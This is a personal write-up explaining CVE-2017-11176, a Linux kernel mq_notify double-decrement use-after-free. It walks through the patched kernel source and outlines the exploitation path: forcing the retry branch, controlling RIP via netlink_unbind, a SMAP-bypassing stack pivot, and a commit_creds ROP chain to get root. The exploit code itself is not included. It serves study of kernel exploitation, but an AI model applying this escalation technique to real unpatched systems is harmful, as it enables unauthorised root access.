-----------------------------[CVE-2017-11176]----------------------------------
-------------------------------------------------------------------------------
CVE-2017-11176 aka "mq_notify: double sock_put()" is a exploitable bug that was
patched at 2017.
The patch is only 1 line, which is interesting:
diff --git a/ipc/mqueue.c b/ipc/mqueue.c
index c9ff943..eb1391b 100644
--- a/ipc/mqueue.c
+++ b/ipc/mqueue.c
@@ -1270,8 +1270,10 @@ retry:
timeo = MAX_SCHEDULE_TIMEOUT;
ret = netlink_attachskb(sock, nc, &timeo, NULL);
- if (ret == 1)
+ if (ret == 1) {
+ sock = NULL;
goto retry;
+ }
if (ret) {
sock = NULL;
nc = NULL;
It only set sock to NULL, and there is no bug anymore.
CVE description:
The mq_notify function in the Linux kernel through 4.11.9 does not set the sock
pointer to NULL upon entry into the retry logic. During a user-space close of a
Netlink socket, it allows attackers to cause a denial of service (use-after-fr-
ee) or possibly have unspecified other impact.
From the CVE description we know that:
- The vulnerable syscall is `mq_notify`.
- It's something with Netlink sockets, exactly retry logic.
- The last vulnerable kernel is 4.11.9.
- The bug can cause denial-of-service or maybe other impact (LPE in this case).
I developed my exploit under Linux 4.11.8, using SLAB as our dynamic memory al-
locator,the protections mechanisms are the default ones (SMAP/SMEP) both enabl-
ed, KASLR disabled (KASLR is enabled by default starting at version 4.12).
The vulnerability we have is a UAF (I will show you why).
Because the vulnerable syscall is mq_notify I first went to read what the manu-
al has to say about this syscall.
And I found that this syscall allow sending notifications between processes at
the arrival of a new on the an empty message queue.
I will take you through the code now, don't feel overwhelmed the vulnerability
is easy to find.
SYSCALL_DEFINE2(mq_notify, mqd_t, mqdes,
const struct sigevent __user *, u_notification)
{
int ret;
struct fd f;
struct sock *sock;
struct inode *inode;
struct sigevent notification;
struct mqueue_inode_info *info;
struct sk_buff *nc;
if (u_notification) {
if (copy_from_user(¬ification, u_notification,
sizeof(struct sigevent)))
return -EFAULT;
}
audit_mq_notify(mqdes, u_notification ? ¬ification : NULL);
nc = NULL;
sock = NULL;
if (u_notification != NULL) {
if (unlikely(notification.sigev_notify != SIGEV_NONE &&
notification.sigev_notify != SIGEV_SIGNAL &&
notification.sigev_notify != SIGEV_THREAD))
return -EINVAL;
if (notification.sigev_notify == SIGEV_SIGNAL &&
!valid_signal(notification.sigev_signo)) {
return -EINVAL;
}
if (notification.sigev_notify == SIGEV_THREAD) {
long timeo;
/* create the notify skb */
nc = alloc_skb(NOTIFY_COOKIE_LEN, GFP_KERNEL);
if (!nc) {
ret = -ENOMEM;
goto out;
}
if (copy_from_user(nc->data,
notification.sigev_value.sival_ptr,
NOTIFY_COOKIE_LEN)) {
ret = -EFAULT;
goto out;
}
/* TODO: add a header? */
skb_put(nc, NOTIFY_COOKIE_LEN);
/* and attach it to the socket */
retry:
f = fdget(notification.sigev_signo);
if (!f.file) {
ret = -EBADF;
goto out;
}
sock = netlink_getsockbyfilp(f.file);
fdput(f);
if (IS_ERR(sock)) {
ret = PTR_ERR(sock);
sock = NULL;
goto out;
}
timeo = MAX_SCHEDULE_TIMEOUT;
ret = netlink_attachskb(sock, nc, &timeo, NULL);
if (ret == 1)
goto retry;
if (ret) {
sock = NULL;
nc = NULL;
goto out;
}
}
}
...
out:
if (sock)
netlink_detachskb(sock, nc);
else if (nc)
dev_kfree_skb(nc);
return ret;
}
First it take our sigevent we provide and copy it to the kernel.
It makes some sanity checks for the sigev_notify field, we will provide SIGEV_T
HREAD as our sigev_notify (to enter the interesting path).
Now it will call alloc_skb(), which will just allocate a socket buffer and ret-
urn to to nc, we will have a valid address for nc (unless the system goes out
of memory) so we pass the check, then another copy_from_user which means sival\_
ptr should be a valid userland address.
Then a call to skb_put() which will add enough space to our socket buffer we h-
ave the len is 32.
Now we reached the retry label, that's the `retry logic` they were talking abo-
ut.
What's wrong with this retry logic? let's find out.
First it calls fdget() on a fd that we control (from userspace).
fdget() will take a reference of the file we provide and it will increment
its refcount. We will provide a correct fd, to not end here and return an err.
Now comes netlink_getsockbyfilp(), here is the source code:
struct sock *netlink_getsockbyfilp(struct file *filp)
{
struct inode *inode = file_inode(filp);
struct sock *sock;
if (!S_ISSOCK(inode->i_mode))
return ERR_PTR(-ENOTSOCK);
sock = SOCKET_I(inode)->sk;
if (sock->sk_family != AF_NETLINK)
return ERR_PTR(-EINVAL);
sock_hold(sock);
return sock;
}
First it will check that if the file we provided is actually a socket (because
there are 7 types of files, that you can open and get back an fd : regular file
, directory, character device, block device, socket and fifo).
Next it will take the sk field (because it is a socket the sk is a field of ty-
pe struct sock *).
It will check if the family is AF_NETLINK (if you took a look at the exploit,
we are using this family to bypass this check).
Now it will call sock_hold(), what this function does is:
static __always_inline void sock_hold(struct sock *sk)
{
atomic_inc(&sk->sk_refcnt);
}
So it will inc the refcount of the socket.
When this function return we will call fdput().
fdput() -> fput() -> atomic_long_dec_and_test(&file->f_count)
fdput() will release the reference and decrement the refcount. -1
Now we are calling netlink_attachskb() and this is an important function, our
exploit rely on the return value of this function (we forced it to return 1) a-
nd that what we want just to go to retry again.
int netlink_attachskb(struct sock *sk, struct sk_buff *skb,
long *timeo, struct sock *ssk)
{
struct netlink_sock *nlk;
nlk = nlk_sk(sk);
if ((atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf ||
test_bit(NETLINK_S_CONGESTED, &nlk->state))) {
DECLARE_WAITQUEUE(wait, current);
if (!*timeo) {
if (!ssk || netlink_is_kernel(ssk))
netlink_overrun(sk);
sock_put(sk);
kfree_skb(skb);
return -EAGAIN;
}
__set_current_state(TASK_INTERRUPTIBLE);
add_wait_queue(&nlk->wait, &wait);
if ((atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf ||
test_bit(NETLINK_S_CONGESTED, &nlk->state)) &&
!sock_flag(sk, SOCK_DEAD))
*timeo = schedule_timeout(*timeo);
__set_current_state(TASK_RUNNING);
remove_wait_queue(&nlk->wait, &wait);
sock_put(sk);
if (signal_pending(current)) {
kfree_skb(skb);
return sock_intr_errno(*timeo);
}
return 1;
}
netlink_skb_set_owner_r(skb, sk);
return 0;
}
First of all it will check if sk_rmem_alloc (actual data - it can grow) is big-
ger than sk_rcvbuf (is just the theoretical value). If the condition is met it
will enter that branch that we want (to return 1).
For the second condition (after `||` operand):
Here test_bit() implementation:
static inline int
test_bit(int nr, const volatile void * addr)
{
return (1UL & (((const int *) addr)[nr >> 5] >> (nr & 31))) != 0UL;
}
Because NETLINK_S_CONGESTED is 0x0, the condition becomes: (1 & nlk->state)
This condition looks easy and it will take us to the branch we want very easily
but it turned out to be hard, so I satisfied the first condition, the function
called flood() to fill the sk_rmem_alloc and make it bigger than sk_rcvbuf.
Now that we're inside the branch we want, it set our task (main task)as TASK_I-
NTERRUPTIBLE and it will add our task to our wait queue using add_wait_queue(),
then it will call schedule_timeout() and our task will be blocked waiting for
another thread to wake it up, and I implemented this in my exploit, you can wa-
ke it up using setsockopt() from another thread.
Now it will set our task state as TASK_RUNNING (executed by CPU or it will be
nearly), and remove it from the wait queue (not waiting anymore).
Now sock_put() will be called, and this is what sock_put() is doing:
static inline void sock_put(struct sock *sk)
{
if (atomic_dec_and_test(&sk->sk_refcnt))
sk_free(sk);
}
atomic decrement if the socket refcount and the free it as expected!
Now you can ignore signal_pending() call because it's only testing for a flag
in our task_struct the flag is TIF_SIGPENDING which is not available and it wi-
ll return 0.
Now we are returning 1 from netlink_attachskb()! finally!
Now back to the very first function, if (ret == 1) it will go back to retry,
what if we closed our socket file at the window when the function returned 1,
and when the execution goes back to retry again?
When closing the file both the refcount for the file and sock becomes 0.
Now fdget() will return an error because the file is closed (we will still have
reference to it by dup() syscall) and the execution is transfered to out label.
out:
if (sock)
netlink_detachskb(sock, nc);
else if (nc)
dev_kfree_skb(nc);
Because sock is not NULLed, netlink_detachskb() will be called again on sock,
and it will call
void netlink_detachskb(struct sock *sk, struct sk_buff *skb)
{
kfree_skb(skb);
sock_put(sk);
}
sock_put() will decrement the refcount once again! and that was the
vulnerability for this CVE, double decrement of the sock refcount, which will
make it freed but a reference to it is still there.
I understand it like this:
file -> sock
refcount: 2 -> 2
After executing the vulnerability:
file -> sock
refcount: 1 -> 0 (-1 from the first netlink_attachskb()
and another -1 when going out and
executing netlink_detachskb()
)
Now we have a UAF and we can allocate whatever we want on that dangling netlin-
k_sock.
To control RIP using this UAF, I found that netlink_release can give us RIP
control if we can satisfy some requirements:
static int netlink_release(struct socket *sock)
{
struct sock *sk = sock->sk;
struct netlink_sock *nlk;
if (!sk)
return 0;
netlink_remove(sk);
sock_orphan(sk);
nlk = nlk_sk(sk);
/*
* OK. Socket is unlinked, any packets that arrive now
* will be purged.
*/
/* must not acquire netlink_table_lock in any way again before unbind
* and notifying genetlink is done as otherwise it might deadlock
*/
if (nlk->netlink_unbind) {
int i;
for (i = 0; i < nlk->ngroups; i++)
if (test_bit(i, nlk->groups))
[RIP CONTROL] nlk->netlink_unbind(sock_net(sk), i + 1);
...
This code can be reached by calling close(sock_fd).
nlk->netlink_unbind() is controlled using the UAF. You can ignore netlink_remo-
ve() and sock_orphan(), they don't crash our kernel.
To achieve that line of code first we need to make nlk->group as 1 (or any pos-
itive number), and point nlk->groups to any kernel value that can return a pos-
itive number and enter nlk->netlink_unbind() in my exploit I made that pointer
printk lol.
Now that we control RIP what we will do with it (SMEP and SMAP are enabled).
I found that RBP is pointing to our UAF chunk, and I found this gadget (Bypass-
ing SMAP):
lea rsp, [rbp - 0x28] ; pop rbx ; pop r12 ; pop r13 ; pop r14 ; pop r15
; pop rbp ; ret
Which will be perfect, if we can corrupt the head of our UAF chunk with our ROP
chain, and it worked perfectly.
We will be just calling commit_creds(prepare_kernel_cred(NULL)) and return to
userland to pop a shell.
I enjoyed writing this exploit, and it took me a while to complete it.
Lexfo did a great job explaining every step they did when developing their
exploit on a production kernel (real system running on real hardware not emula-
tion).
They were using System tab to debug their exploit. I highly recommend you to r-
ead their write-up about this specefic CVE.
References:
https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html
https://elixir.bootlin.com/linux/v4.11.8/source/ipc/mqueue.c#L1191
https://man7.org/linux/man-pages/man3/mq_notify.3.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11176